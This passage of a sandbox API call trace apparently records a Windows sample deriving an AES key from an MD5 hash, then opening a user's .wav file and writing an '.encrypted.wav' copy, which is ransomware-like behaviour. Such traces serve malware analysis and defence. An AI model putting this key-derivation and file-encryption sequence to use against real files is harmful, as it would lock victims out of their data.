wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.271] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.271] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.271] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.271] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.271] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0038.271] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.271] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5c40) returned 1 [0038.272] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.272] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.272] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0038.272] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.272] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.272] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.272] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.272] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.272] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0038.273] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.273] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.273] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.273] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.273] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.273] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.273] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0038.273] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.273] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.273] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0038.273] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.273] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.273] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0038.273] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.273] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.273] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0038.274] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.274] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.274] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.274] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.274] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.274] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.274] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.274] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0038.274] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.274] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.274] CryptCreateHash (in: hProv=0x7d5c40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0038.274] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.274] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.274] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.274] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.274] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0038.274] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.274] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.274] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.274] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.275] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.275] CryptHashData (hHash=0x7c2100, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0038.275] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.275] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.275] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.275] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.275] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.275] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0038.275] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.275] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.275] CryptDeriveKey (in: hProv=0x7d5c40, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0038.275] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.275] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.275] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.275] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.275] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.275] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.275] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0038.275] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.275] CryptDestroyHash (hHash=0x7c2100) returned 1 [0038.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0038.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0038.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0038.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0038.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0038.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0038.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0038.276] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0038.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0038.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0038.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0038.276] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0038.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0038.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0038.276] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.276] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.276] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0038.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0038.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0038.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0038.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0038.276] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ohsKY-A9exL.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ohsky-a9exl.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0038.276] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.276] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0038.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0038.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0038.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0038.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0038.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0038.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0038.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0038.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0038.277] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0038.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0038.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0038.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0038.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0038.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0038.277] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0038.277] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0038.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0038.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0038.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0038.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0038.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0038.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0038.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0038.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0038.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0038.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0038.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0038.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0038.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0038.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0038.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0038.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0038.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0038.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0038.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0038.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0038.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0038.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0038.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0038.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0038.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0038.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0038.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0038.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0038.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0038.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0038.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0038.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0038.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0038.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0038.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0038.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0038.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0038.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0038.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0038.278] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music")) returned 0x11 [0038.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0038.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0038.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0038.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0038.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0038.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0038.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0038.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0038.279] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ohsKY-A9exL.encrypted.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ohsky-a9exl.encrypted.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0038.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0038.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0038.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0038.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0038.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0038.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0038.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0038.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0038.279] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0038.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0038.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0038.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0038.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0038.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0038.280] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0038.280] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0038.280] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0038.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0038.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0038.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 